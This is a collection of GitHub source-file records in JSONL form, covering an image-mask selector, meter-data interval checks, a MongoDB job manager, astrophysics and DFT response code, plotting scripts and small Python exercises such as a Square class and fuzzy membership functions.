+{"seq_id":"15907813457","text":"#!/usr/bin/env python3\nimport os\nimport pygame\nimport sys\nimport glob\nfrom window import Window\nimport numpy as np\nsys.path.append(os.getcwd())\nfrom viewer import fix\nfrom tqdm import tqdm\nfrom PIL import Image\n\n# to generate:\n# grep -vIr \"\\x00\" -- */*/ent.txt > /tmp/ents\n# cat /tmp/ents | sort -t \":\" -k2 -n -r > /tmp/entssort\n\nBASEDIR = sys.argv[1]\n\nwin = Window(1164, 874)\ncc = 0\n\nif len(sys.argv) > 3:\n mask = sys.argv[3]\nelse:\n mask = \"h%03d\"\n\nwhile len(glob.glob((\"imgs/\"+mask+\"*\") % cc)) > 0:\n cc += 1\nprint(\"starting with %d\" % cc)\n\nseen = set([x.split(\"_\", 1)[1] for x in glob.glob(\"imgs/*\")])\n\n# permanent camera occulusions\nEXCLUDE_USERS = [\"807f77aac0daa4b6\", \"84e6a31bffe59bee\"]\n\nseek_fn = None\n#seek_fn = glob.glob(\"imgs/\"+(mask % (cc-1))+\"*\")[0].split(\"_\", 1)[1]\n#print(seek_fn)\n\no = 2\ndat = open(sys.argv[2]).read().strip().split(\"\\n\")\nfor d in tqdm(dat):\n fn = os.path.join(BASEDIR, d.split(\":\")[0].replace(\"/ent.txt\", \"\"))\n dd = sorted(os.listdir(fn))\n if seek_fn is not None:\n #print(dd[1], seek_fn)\n if not dd[1].endswith(seek_fn):\n continue\n seek_fn = None\n\n if dd[1][5:] in seen:\n continue\n if dd[1].split(\"_\")[1] in EXCLUDE_USERS:\n continue\n print(dd)\n\n ii = np.array(Image.open(os.path.join(fn, dd[1])))\n segi = fix(Image.open(os.path.join(fn, dd[2])))\n while 1:\n pii = ii*((10-o)/10) + segi*(o/10)\n win.draw(pii)\n kk = win.getkey()\n if kk == ord(\"z\"):\n suf = dd[1][5:]\n outn = (\"imgs/\"+mask+\"_%s\") % (cc, suf)\n print(\"saving \", outn)\n im = Image.fromarray(ii)\n im.save(outn)\n im = Image.fromarray(segi)\n im.save(outn.replace(\"imgs/\", \"masks/\"))\n cc += 1\n break\n elif kk == pygame.locals.K_UP:\n o = min(10, o+1)\n elif kk == pygame.locals.K_DOWN:\n o = max(0, o-1)\n elif kk == ord(\" \"):\n break\n\n\n\n","repo_name":"commaai/comma10k","sub_path":"tools/selector.py","file_name":"selector.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":640,"dataset":"github-code","pt":"36"}
+{"seq_id":"1915200176","text":"import numpy as np\nimport pandas as pd \n\n\"\"\"\n Every one of these functions expects a full interval df (so zero and NaN intervals) \n but will only give a predictions for the zero intervals \n\"\"\"\n\ndef sign_change_intervals(interval_df):\n zero_intervals = interval_df.query('interval_value == 0')\n short_zero_intervals = (\n zero_intervals\n .replace({'start':np.nan, 'end': np.nan})\n .dropna(subset = ['0th_value_after_end', 'value_before_start'])\n .query('interval_length == 1')\n )\n sign_change_intervals = np.sign(short_zero_intervals['value_before_start']) == - np.sign(short_zero_intervals['0th_value_after_end'])\n result = pd.Series(index = zero_intervals.index, dtype = 'object')\n \n # a short zero interval with a sign change is normal\n result.loc[sign_change_intervals[sign_change_intervals].index] = False\n \n return result\n \n \ndef low_consumption_on_both_sides_intervals(interval_df): \n zero_intervals = interval_df.query('interval_value == 0')\n short_zero_intervals = (\n zero_intervals\n .replace({'start':np.nan, 'end': np.nan})\n .dropna(subset = ['0th_value_after_end', 'value_before_start'])\n .query('interval_length == 1')\n )\n low_consumption = (np.abs(short_zero_intervals['value_before_start']) < 0.1) & (np.abs(short_zero_intervals['0th_value_after_end']) < 0.1)\n result = pd.Series(index = zero_intervals.index, dtype = 'object')\n \n # a short zero interval with low consumption on both sides is normal\n result.loc[low_consumption[low_consumption].index] = False\n \n return result\n\ndef collective_error_intervals(interval_df, threshold = 2): \n # count how much each start time occurs\n interval_counts = interval_df.reset_index().groupby('start')[['meterID', 'year']].size()\n # add this to the interval df as a column\n intervals_with_count = interval_df.join(interval_counts.to_frame('count'), on = ['start'])\n\n # only use the intervals with a very high count\n intervals_with_count = intervals_with_count[intervals_with_count['count'] >= 33] \n\n # filter each group of intervals that start on the same moment, only allow intervals with the most common length +- a threshold (in this case 2)\n def filter_groups(df): \n most_common_value = df.interval_length.value_counts().idxmax()\n return df[(df.interval_length >= most_common_value -threshold) & (df.interval_length <= most_common_value + threshold) ]\n intervals_with_count = intervals_with_count.groupby('start_time').apply(filter_groups).droplevel(0)\n \n # each of the intervals that remains is thus a collective data problem and is a data error\n collective_data_problems = pd.Series(index = interval_df.index, dtype = 'object')\n collective_data_problems.loc[intervals_with_count.index] = True\n return collective_data_problems\n ","repo_name":"jankrans/Conditional-Generative-Neural-Networks","sub_path":"repositories/profile-clustering/notebooks/real_data_exploration/handling_zeros_and_nans/zero_intervals.py","file_name":"zero_intervals.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"30199883148","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: ai ts=4 sts=4 et sw=4 nu\n\"\"\"\n(c) 2015 Ronan Delacroix\nJob Manager Job Abstract Class\n:author: Ronan Delacroix\n\"\"\"\nimport os\nimport logging\nimport mongoengine\nimport mongoengine.signals\nimport tbx\nimport tbx.process\nimport tbx.service\nimport tbx.log\nimport tbx.text\nimport uuid as UUID\nimport traceback\nimport tempfile\nimport shutil\nfrom datetime import datetime, timedelta\nimport jobmanager.common as common\nfrom .host import Host\nfrom tbx.code import cached_property\n\n\njob_status_to_icon = {\n 'new': \"\\u23F8\",\n 'pending': \"\\u23F8\",\n 'running': \"\\u25B6\",\n 'success': \"\\u2605\",\n 'error': \"\\u2716\"\n}\n\n\nclass Job(common.NamedDocument, common.Runnable, common.LogProxy, common.AutoDocumentable):\n\n meta = {\n 'collection': 'jobs',\n 'indexes': [\n 'status',\n 'created',\n ]\n }\n\n status_text = mongoengine.StringField(required=True, default=\"\")\n hostname = mongoengine.StringField()\n completion = mongoengine.IntField(required=True, min_value=0, max_value=100, default=0)\n timeout = mongoengine.IntField(min_value=0, default=43200) # 12 hours\n ttl = mongoengine.IntField(min_value=1, default=1)\n history = mongoengine.ListField(field=mongoengine.DictField(), default=[])\n\n def __str__(self):\n return \"%s %s\" % (self.name, job_status_to_icon.get(self.status, self.status))\n\n @classmethod\n def default_slot_amount(cls):\n \"\"\"\n Returns the default number of jobs that can be run at the same time on the same machine/client.\n Override and set to math.inf for no limiting amount.\n You can base that on how many CPU cores you have or anything else.\n Default is 1 job at a time.\n \"\"\"\n return 1\n\n @cached_property\n def extra_log_arguments(self):\n return {\n 'job_type': self.__class__.__name__,\n 'job_uuid': self.uuid,\n 'job_status': self.status,\n }\n\n def update_status(self, completion=None, text=None):\n if text:\n self.status_text = text\n\n if completion:\n self.completion = completion\n\n log = self.log_info\n if self.status == 'error':\n log = self.log_error\n\n log(\"Progress update : {progress:5.1f}% - {message}\".format(\n progress=self.completion,\n message=self.status_text\n ))\n\n self.update(\n add_to_set__history={'t': datetime.utcnow(), 'm': self.status_text, 'c': self.completion, 's': self.status},\n status=self.status,\n details=self.details,\n completion=self.completion,\n status_text=self.status_text,\n started=self.started,\n finished=self.finished\n )\n\n def update_progress(self, completion, text=None):\n self.update_status(completion=completion, text=text)\n\n def save_as_successful(self, text=\"Job Successful\"):\n self.update_status(100, text=text)\n self.save() # Saves a other fields\n\n def save_as_error(self, text=\"Job Error\"):\n self.status = 'error'\n self.update_status(text=text)\n self.save()\n\n\nmongoengine.signals.pre_save.connect(common.update_modified)\n\n\nclass JobTask(mongoengine.EmbeddedDocument, common.Runnable, common.LogProxy, common.AutoDocumentable):\n meta = {\n 'abstract': True,\n }\n\n status = mongoengine.StringField(required=True, default=\"pending\",\n choices=('new', 'pending', 'running', 'success', 'error'))\n details = mongoengine.StringField(required=False)\n\n @property\n def job(self):\n if isinstance(self._instance, JobTask):\n return self._instance.job\n return self._instance\n\n @cached_property\n def extra_log_arguments(self):\n extra_log_arguments = {}\n if isinstance(self.job, common.LogProxy):\n extra_log_arguments = self.job.extra_log_arguments\n extra_log_arguments['task'] = self.name\n return extra_log_arguments\n\n def __str__(self):\n return \"%s > %s\" % (self.job, self.name)\n\n def get_hash(self):\n import base64\n import hashlib\n return base64.b64encode(\n hashlib.sha1(mongoengine.EmbeddedDocument.to_json(self, sort_keys=True).encode()).digest()).decode().strip('=').replace(\"+\", \"-\")\n\n def update_status(self, completion=None, text=None):\n # TODO : Review this part // Completion between tasks and jobs is not clear.\n if text:\n self.job.status_text = text\n\n if completion:\n self.job.completion = completion\n\n log = self.log_info\n if self.status == 'error':\n log = self.log_error\n\n log(\"Progress update : {progress:5.1f}% - {message}\".format(\n progress=self.job.completion,\n message=text\n ))\n\n self.job.update(\n add_to_set__history={'t': datetime.utcnow(), 'k': self.name, 'm': text, 'c': completion},\n completion=completion,\n status_text=text\n )\n\n def update_progress(self, completion, text=None):\n self.update_status(completion=completion, text=text)\n\n\ndef make_job(job_name, **kwargs):\n \"\"\"\n Decorator to create a Job from a function.\n Give a job name and add extra fields to the job.\n\n @make_job(\"ExecuteDecJob\",\n command=mongoengine.StringField(required=True),\n output=mongoengine.StringField(default=None))\n def execute(job: Job):\n job.log_info('ExecuteJob %s - Executing command...' % job.uuid)\n result = subprocess.run(job.command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n job.output = result.stdout.decode('utf-8') + \" \" + result.stderr.decode('utf-8')\n\n \"\"\"\n def wraps(func):\n kwargs['process'] = func\n job = type(job_name, (Job,), kwargs)\n globals()[job_name] = job\n return job\n return wraps\n","repo_name":"ronhanson/python-jobmanager-common","sub_path":"jobmanager/common/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":5995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"23702290276","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import division, print_function, unicode_literals\n\n__all__ = [\"GPLikelihood\"]\n\nimport numpy as np\n\ntry:\n import george\nexcept ImportError:\n george = None\nelse:\n from george.kernels import Matern32Kernel\n\nfrom ..pipeline import Pipeline\nfrom ..gp_heuristics import estimate_tau\n\n\nclass GPLikelihood(Pipeline):\n\n query_parameters = dict(\n tau_frac=(0.25, False),\n )\n\n def __init__(self, *args, **kwargs):\n if george is None:\n raise ImportError(\"george is required for the GP model\")\n kwargs[\"cache\"] = kwargs.pop(\"cache\", False)\n super(GPLikelihood, self).__init__(*args, **kwargs)\n\n def get_result(self, query, parent_response):\n lcs = [LCWrapper(lc, tau_frac=query[\"tau_frac\"])\n for lc in parent_response.light_curves]\n return dict(model_light_curves=lcs)\n\n\nclass LCWrapper(object):\n\n def __init__(self, lc, dist_factor=10.0, time_factor=0.1, tau_frac=0.25):\n self.time = lc.time\n mu = np.median(lc.flux)\n self.flux = lc.flux / mu - 1.0\n self.ferr = lc.ferr / mu\n\n # Convert to parts per thousand.\n self.flux *= 1e3\n self.ferr *= 1e3\n\n # Estimate the kernel parameters.\n tau = tau_frac * estimate_tau(self.time, self.flux)\n self.kernel = np.var(self.flux) * Matern32Kernel(tau ** 2)\n self.gp = george.GP(self.kernel, solver=george.HODLRSolver)\n self.K_0 = self.gp.get_matrix(self.time)\n self.gp.compute(self.time, self.ferr, seed=1234)\n self.alpha = self.gp.solver.apply_inverse(self.flux)\n\n # Compute the likelihood of the null model.\n self.ll0 = self.lnlike()\n\n # def lnlike(self, model=None):\n # # No model is given. Just evaluate the lnlikelihood.\n # if model is None:\n # return -0.5 * np.dot(self.flux, self.alpha)\n\n # # A model is given, use it to do a linear fit.\n # m = model(self.time)\n # if m[0] != 0.0 or m[-1] != 0.0 or np.all(m == 0.0):\n # return 0.0, 0.0, 0.0\n\n # # Compute the inverse variance.\n # Cm = self.gp.solver.apply_inverse(m)\n # S = np.dot(m, Cm)\n # if S <= 0.0:\n # return 0.0, 0.0, 0.0\n\n # # Compute the depth.\n # d = np.dot(m, Cf) / S\n # if not np.isfinite(d):\n # return 0.0, 0.0, 0.0\n\n # # Compute the lnlikelihood.\n # dll = -0.5*np.dot(self.flux-d*m, Cf-d*Cm) - self.ll0\n # if not np.isfinite(dll):\n # return 0.0, 0.0, 0.0\n\n # return dll, d, S\n\n # def predict(self, y=None):\n # if y is None:\n # y = self.flux\n # return self.gp.predict(y, self.time, mean_only=True)\n\n def lnlike_eval(self, y):\n return -0.5 * np.dot(y, self.gp.solver.apply_inverse(y))\n\n def lnlike(self, model=None):\n if model is None:\n return -0.5 * np.dot(self.flux, self.alpha)\n\n # Evaluate the transit model.\n m = model(self.time)\n if m[0] != 0.0 or m[-1] != 0.0 or np.all(m == 0.0):\n return 0.0, 0.0, 0.0\n\n Km = self.gp.solver.apply_inverse(m)\n Ky = self.alpha\n ivar = np.dot(m, Km)\n depth = np.dot(m, Ky) / ivar\n r = self.flux - m*depth\n ll = -0.5 * np.dot(r, Ky - depth * Km)\n return ll - self.ll0, depth, ivar\n\n def predict(self, y=None):\n if y is None:\n y = self.flux\n return np.dot(self.K_0, self.gp.solver.apply_inverse(y))\n","repo_name":"dfm/ketu","sub_path":"ketu/kepler/likelihood.py","file_name":"likelihood.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"36"}
+{"seq_id":"37569237521","text":"def absol(x):\n if x >= 0:\n return x\n elif x < 0:\n return -x\n else:\n return 'stop messing around'\n\ntall = int(input('Which number do you want the absolute value of? '))\nprint(f\"The absolute value of {tall} is\", absol(tall))","repo_name":"jorul/ITGK","sub_path":"ITGK øvinger/Øving 5 uke 41/Varierte funksjoner/a absoluttverdi.py","file_name":"a absoluttverdi.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"37349149947","text":"\"\"\"XC density kernels for response function calculations.\"\"\"\n\nimport numpy as np\n\nfrom my_gpaw.response.localft import LocalFTCalculator\nfrom my_gpaw.response.fxc_kernels import AdiabaticFXCCalculator\n\n\ndef get_density_xc_kernel(qpd, gs, context, functional='ALDA',\n rshelmax=-1, rshewmin=None,\n chi0_wGG=None):\n \"\"\"Density-density xc kernels.\n Factory function that calls the relevant functions below.\"\"\"\n\n p = context.print\n nspins = len(gs.nt_sR)\n assert nspins == 1\n\n if functional[0] == 'A':\n # Standard adiabatic kernel\n p('Calculating %s kernel' % functional)\n localft_calc = LocalFTCalculator.from_rshe_parameters(\n gs, context, rshelmax=rshelmax, rshewmin=rshewmin)\n fxc_calculator = AdiabaticFXCCalculator(localft_calc)\n fxc_kernel = fxc_calculator(functional, '00', qpd)\n Kxc_GG = fxc_kernel.get_Kxc_GG()\n\n if qpd.kd.gamma:\n Kxc_GG[0, :] = 0.0\n Kxc_GG[:, 0] = 0.0\n Kxc_sGG = np.array([Kxc_GG])\n elif functional[:2] == 'LR':\n p('Calculating LR kernel with alpha = %s' % functional[2:])\n Kxc_sGG = calculate_lr_kernel(qpd, alpha=float(functional[2:]))\n elif functional == 'Bootstrap':\n p('Calculating Bootstrap kernel')\n Kxc_sGG = get_bootstrap_kernel(qpd, chi0_wGG, context)\n else:\n raise ValueError('Invalid functional for the density-density '\n 'xc kernel:', functional)\n\n return Kxc_sGG[0]\n\n\ndef calculate_lr_kernel(qpd, alpha=0.2):\n \"\"\"Long range kernel: fxc = \\alpha / |q+G|^2\"\"\"\n\n assert qpd.kd.gamma\n\n f_G = np.zeros(len(qpd.G2_qG[0]))\n f_G[0] = -alpha\n f_G[1:] = -alpha / qpd.G2_qG[0][1:]\n\n return np.array([np.diag(f_G)])\n\n\ndef get_bootstrap_kernel(qpd, chi0_wGG, context):\n \"\"\" Bootstrap kernel (see below) \"\"\"\n\n if context.comm.rank == 0:\n chi0_GG = chi0_wGG[0]\n if context.comm.size > 1:\n # If size == 1, chi0_GG is not contiguous, and broadcast()\n # will fail in debug mode. So we skip it until someone\n # takes a closer look.\n context.comm.broadcast(chi0_GG, 0)\n else:\n nG = qpd.ngmax\n chi0_GG = np.zeros((nG, nG), complex)\n context.comm.broadcast(chi0_GG, 0)\n\n return calculate_bootstrap_kernel(qpd, chi0_GG, context)\n\n\ndef calculate_bootstrap_kernel(qpd, chi0_GG, context):\n \"\"\"Bootstrap kernel PRL 107, 186401\"\"\"\n p = context.print\n\n if qpd.kd.gamma:\n v_G = np.zeros(len(qpd.G2_qG[0]))\n v_G[0] = 4 * np.pi\n v_G[1:] = 4 * np.pi / qpd.G2_qG[0][1:]\n else:\n v_G = 4 * np.pi / qpd.G2_qG[0]\n\n nG = len(v_G)\n K_GG = np.diag(v_G)\n\n Kxc_GG = np.zeros((nG, nG), dtype=complex)\n dminv_GG = np.zeros((nG, nG), dtype=complex)\n\n for iscf in range(120):\n dminvold_GG = dminv_GG.copy()\n Kxc_GG = K_GG + Kxc_GG\n\n chi_GG = np.dot(np.linalg.inv(np.eye(nG, nG)\n - np.dot(chi0_GG, Kxc_GG)), chi0_GG)\n dminv_GG = np.eye(nG, nG) + np.dot(K_GG, chi_GG)\n\n alpha = dminv_GG[0, 0] / (K_GG[0, 0] * chi0_GG[0, 0])\n Kxc_GG = alpha * K_GG\n p(iscf, 'alpha =', alpha, flush=False)\n error = np.abs(dminvold_GG - dminv_GG).sum()\n if np.sum(error) < 0.1:\n p('Self consistent fxc finished in %d iterations !' % iscf)\n break\n if iscf > 100:\n p('Too many fxc scf steps !')\n\n return np.array([Kxc_GG])\n","repo_name":"f-fathurrahman/ffr-learns-gpaw","sub_path":"my_gpaw/response/density_kernels.py","file_name":"density_kernels.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"18955742169","text":"import matplotlib.pyplot as plt\nfrom matplotlib import rc\n\nfrom src.experiment.fs_study.setup import classifiers, experiment_setups\nfrom src.features.selection.wrappers import fs_wrappers\nfrom src.utils.file_handling.processors import CsvProcessor\n\nfont = {'family': 'normal',\n 'weight': 'normal',\n 'size': 12}\nrc('font', **{'family': 'sans-serif', 'sans-serif': ['Helvetica']})\n\n## for Palatino and other serif fonts use:\nrc('font', **{'family': 'serif', 'serif': ['Palatino']})\nrc('text', usetex=True)\n\ndata_point_labels = [0.01, 0.02, 0.03, 0.05, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1]\nmetric_positions = [0, 3, 5, 7, 13, 15]\nmarkers = ['d', 'o', 'h', '*', 'P', 'p', 's', 'v', '>', '<']\n\nfor experiment_name in experiment_setups.keys():\n plot_data = {}\n for wrapper in fs_wrappers:\n for classifier in classifiers:\n plot_data[classifier.name] = {}\n val_filename = '_'.join([wrapper.name, classifier.name, \"search\"])\n test_filename = '_'.join([wrapper.name, classifier.name, \"search\", \"test\"])\n print(\"Processing files {0} and {1}\".format(val_filename, test_filename))\n\n val_header, val_data = CsvProcessor().read_file(\n filename='summary/' + experiment_name + \"/\" + val_filename)\n test_header, test_data = CsvProcessor().read_file(\n filename='summary/' + experiment_name + \"/\" + test_filename)\n\n if val_header is not None and val_data is not None:\n dataset = ''\n labels = []\n pos = 0\n for i, row in enumerate(val_data):\n if row[0].split('_')[0] != dataset:\n if i == 0:\n dataset = row[0].split('_')[0]\n else:\n plt.title('-'.join([experiment_name.replace('_', '-'), wrapper.name, classifier.name,\n dataset.replace('_', '')]))\n plt.ylabel(r'Quality metrics', fontsize=13)\n plt.xlabel(r'NFEs\\textsubscript{max}', fontsize=13)\n plt.xlim([data_point_labels[0], data_point_labels[-1]])\n plt.ylim(top=1)\n plt.xticks(range(0, 14), data_point_labels)\n plt.tick_params()\n plt.legend(labels=labels, fancybox=False, framealpha=0.9)\n plt.tight_layout()\n plt.grid(b=True, linestyle=':')\n plt.show()\n # plt.savefig('-'.join([experiment_name.replace('_', '-'), wrapper.name, classifier.name,\n # dataset.replace('_', '')]) + \".pdf\",\n # format='pdf', dpi=300)\n plt.close()\n labels = []\n dataset = row[0].split('_')[0]\n pos = 0\n\n if pos in metric_positions:\n scores = [float(score) for score in row[1:]]\n plt.plot(scores, lw=0.75, ms=4, alpha=0.5, marker=markers[metric_positions.index(pos)])\n metric = row[0][row[0].find(dataset) + len(dataset) + 1:].replace('_', '')\n labels.append(metric)\n pos += 1\n plt.close()\n","repo_name":"MarioDudjak/FeatureSelectionWorkflow","sub_path":"reports/visualization/median_search_all_metrics_per_classifier_and_dataset.py","file_name":"median_search_all_metrics_per_classifier_and_dataset.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"37349149947","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n'''this module defines a square by: (based on 1-square.py)\n\n Private instance attribute: size\n Instantiation with optional size: def __init__(self, size=0):\n size must be an integer, otherwise raise a TypeError exception with\n the message size must be an integer\n if size is less than 0, raise a ValueError exception\n with the message size must be >= 0\n\n It also determines the area of the square\n '''\n\n\nclass Square:\n '''A Square class that defines a square and initializes\n the size attribute'''\n def __init__(self, size=0, position=(0, 0)):\n '''Initialize the size and position of a square\n\n Args:\n size(int): Size of the square\n\n '''\n self.size = size\n self.position = position\n\n @property\n def size(self):\n '''A method that retrieves the size of the square'''\n return self.__size\n\n @size.setter\n def size(self, value):\n '''Set the valid value of the size attribute'''\n if isinstance(value, int):\n if value < 0:\n raise ValueError(\"size must be >= 0\")\n self.__size = value\n else:\n raise TypeError(\"size must be an integer\")\n\n @property\n def position(self):\n '''A method that retrieves the position of the square'''\n return self.__position\n\n @position.setter\n def position(self, value):\n \"\"\"Define setter method for __position\"\"\"\n if not isinstance(value, tuple) or len(value) != 2:\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n elif not isinstance(value[0], int) or not isinstance(value[1], int):\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n elif value[1] < 0 or value[0] < 0:\n raise ValueError(\"position must be a tuple of 2 positive integers\")\n else:\n self.__position = value\n\n def area(self):\n '''Determine the area of a square and return it'''\n return self.__size ** 2\n\n def my_print(self):\n \"\"\"Defining my_print method\"\"\"\n if self.__size == 0:\n print()\n else:\n for i in range(self.__position[1]):\n print()\n for i in range(self.__size):\n print(\" \" * self.__position[0], end=\"\")\n print('#' * self.__size)\n","repo_name":"solomonferede1/alx-higher_level_programming","sub_path":"0x06-python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"11606481940","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass Membership_Function:\n @staticmethod\n def triangle(x, a, m, b):\n \"\"\"\n Retorna a função de pertinência triangular.\n\n Parâmetros:\n - x: np.ndarray\n Valores de entrada.\n - a: float\n Valor do ponto de início da função.\n - m: float\n Valor do ponto médio da função.\n - b: float\n Valor do ponto de fim da função.\n\n Retorno:\n - y: np.ndarray\n Valores de saída correspondentes à função de pertinência triangular.\n \"\"\"\n y = np.zeros(x.shape[0]) # Definindo um array de saída do tamnho da entrada.\n first_half = np.logical_and(a < x, x <= m) # Definindo o intervalo de 'subida' da função.\n y[first_half] = (x[first_half] - a) / (m - a) # Definindo os valores da saída para o intervalo de 'subida'.\n second_half = np.logical_and(m <= x, x < b) # Definindo o intervalo de 'descida' da função.\n y[second_half] = (b - x[second_half]) / (b - m) # Definindo os valores da saída para o intervalo de 'descida'.\n return y\n \n @staticmethod\n def trapezoidal(x, a, m, n, b):\n \"\"\"\n Retorna a função de pertinência trapezoidal.\n\n Parâmetros:\n - x: np.ndarray\n Valores de entrada.\n - a: float\n Valor do ponto de início da função.\n - m: float\n Valor do ponto médio esquerdo da função.\n - n: float\n Valor do ponto médio direito da função.\n - b: float\n Valor do ponto de fim da função.\n\n Retorno:\n - y: np.ndarray\n Valores de saída correspondentes à função de pertinência trapezoidal.\n \"\"\"\n y = np.zeros(x.shape[0]) # Definindo saída do tamaho da entrada.\n first_part = np.logical_and(a < x, x <= m) # Definindo o intervalo de subida.\n y[first_part] = (x[first_part] - a) / (m - a) # Definindo os valores da saída no intervalo de subida.\n second_part = np.logical_and(m < x, x < n) # Definindo o intervalo entre subida e decida.\n y[second_part] = 1 # Definindo o valor 1 para todo o intervalo entre subida e decida.\n third_part = np.logical_and(n <= x, x < b) # Definindo o intervalo de decida. 
\n y[third_part] = (b - x[third_part]) / (b - n) # Defininido os valores de saída para o intervalo de saída.\n return y\n \n @staticmethod\n def gaussian(x, k, m):\n \"\"\"\n Retorna a função de pertinência gaussiana.\n\n Parâmetros:\n - x: np.ndarray\n Valores de entrada.\n - k: float\n Valor do parâmetro de largura da função.\n - m: float\n Valor do parâmetro de centro da função.\n\n Retorno:\n - y: np.ndarray\n Valores de saída correspondentes à função de pertinência gaussiana.\n \"\"\"\n k = k / 2\n expoent = (-1) * ((x - m) ** 2) / (k ** 2)\n return np.exp(expoent)\n \n @staticmethod\n def test_functions(type):\n \"\"\"\n Retorna várias funções de pertinência para testes.\n\n Parâmetros:\n - type: int\n Tipo de teste a ser retornado.\n\n Retorno:\n - range: np.ndarray\n Valores de entrada.\n - functions: np.ndarray\n Valores de saída correspondentes às funções de pertinência.\n \"\"\"\n range = np.arange(0, 100, 0.1)\n \n if type == 0: # Retorna uma função de cada tipo de maneira sequêncial\n return range, np.array([\n Membership_Function.triangle(range, 5, 15, 25),\n Membership_Function.trapezoidal(range, 30, 40, 60, 70),\n Membership_Function.gaussian(range, 10, 85)\n ])\n if type == 1: # Retorna vários triângulos com 'm' iguais\n return range, np.array([\n Membership_Function.triangle(range, 0, 50, 100),\n Membership_Function.triangle(range, 10, 50, 90),\n Membership_Function.triangle(range, 20, 50, 80),\n Membership_Function.triangle(range, 30, 50, 70),\n Membership_Function.triangle(range, 40, 50, 60)\n ])\n if type == 2: # Retorna vários triangulos complementares\n return range, np.array([\n Membership_Function.triangle(range, 0, 0, 20),\n Membership_Function.triangle(range, 0, 20, 40),\n Membership_Function.triangle(range, 20, 40, 60),\n Membership_Function.triangle(range, 40, 60, 80),\n Membership_Function.triangle(range, 60, 80, 100),\n Membership_Function.triangle(range, 80, 100, 100)\n ])\n if type == 3: # Retorna vários trapézios com 'n' e 'm' iguais\n return range, np.array([\n Membership_Function.trapezoidal(range, 0, 40, 60, 100),\n Membership_Function.trapezoidal(range, 10, 40, 60, 90),\n Membership_Function.trapezoidal(range, 20, 40, 60, 80),\n Membership_Function.trapezoidal(range, 30, 40, 60, 70)\n ])\n if type == 4: # Retorna vários trapezios complementares\n return range, np.array([\n Membership_Function.trapezoidal(range, -1, 0, 5, 15),\n Membership_Function.trapezoidal(range, 5, 15, 25, 35),\n Membership_Function.trapezoidal(range, 25, 35, 45, 55),\n Membership_Function.trapezoidal(range, 45, 55, 65, 75),\n Membership_Function.trapezoidal(range, 65, 75, 85, 95),\n Membership_Function.trapezoidal(range, 85, 95, 100, 100)\n ])\n if type == 5: # Retorna várias gaussianas com 'm' iguais\n return range, np.array([\n Membership_Function.gaussian(range, 40, 50),\n Membership_Function.gaussian(range, 30, 50),\n Membership_Function.gaussian(range, 20, 50),\n Membership_Function.gaussian(range, 10, 50)\n ])\n if type == 6: # Retorna várias gaussianas complementares\n return range, np.array([\n Membership_Function.gaussian(range, 20, 20),\n Membership_Function.gaussian(range, 20, 0),\n Membership_Function.gaussian(range, 20, 40),\n Membership_Function.gaussian(range, 20, 60),\n Membership_Function.gaussian(range, 20, 80),\n Membership_Function.gaussian(range, 20, 100)\n ])\n if type == 7: # Retorna testes para opração de união\n return range, np.array([\n Membership_Function.triangle(range, 5, 15, 25),\n Membership_Function.trapezoidal(range, 20, 50, 60, 95),\n 
Membership_Function.gaussian(range, 10, 80)\n ])\n if type == 8: # Retorna testes para opração de união\n return range, np.array([\n Membership_Function.triangle(range, 5, 15, 25),\n Membership_Function.gaussian(range, 10, 30)\n ])\n if type == 9: # Retorna testes para opração de interseção\n return range, np.array([\n Membership_Function.trapezoidal(range, 5, 20, 40, 60),\n Membership_Function.gaussian(range, 20, 50)\n ])","repo_name":"Gustavo01rb/Fuzzy","sub_path":"fuzzy/membership_function.py","file_name":"membership_function.py","file_ext":"py","file_size_in_byte":7507,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
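The membership functions in the record above are pure NumPy and easy to sanity-check. A minimal usage sketch, assuming the `Membership_Function` class above is in scope (the plot call is illustrative only, not part of the original module):

```python
import numpy as np
import matplotlib.pyplot as plt

# Triangle rising on [10, 50] and falling on [50, 90].
x = np.arange(0, 100, 0.1)
y = Membership_Function.triangle(x, 10, 50, 90)  # assumes the class above is importable

assert 0.0 <= y.min() and y.max() <= 1.0               # memberships stay in [0, 1]
assert abs(y[np.argmin(np.abs(x - 50))] - 1.0) < 1e-6  # peak of 1 at x = m

plt.plot(x, y)
plt.show()
```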
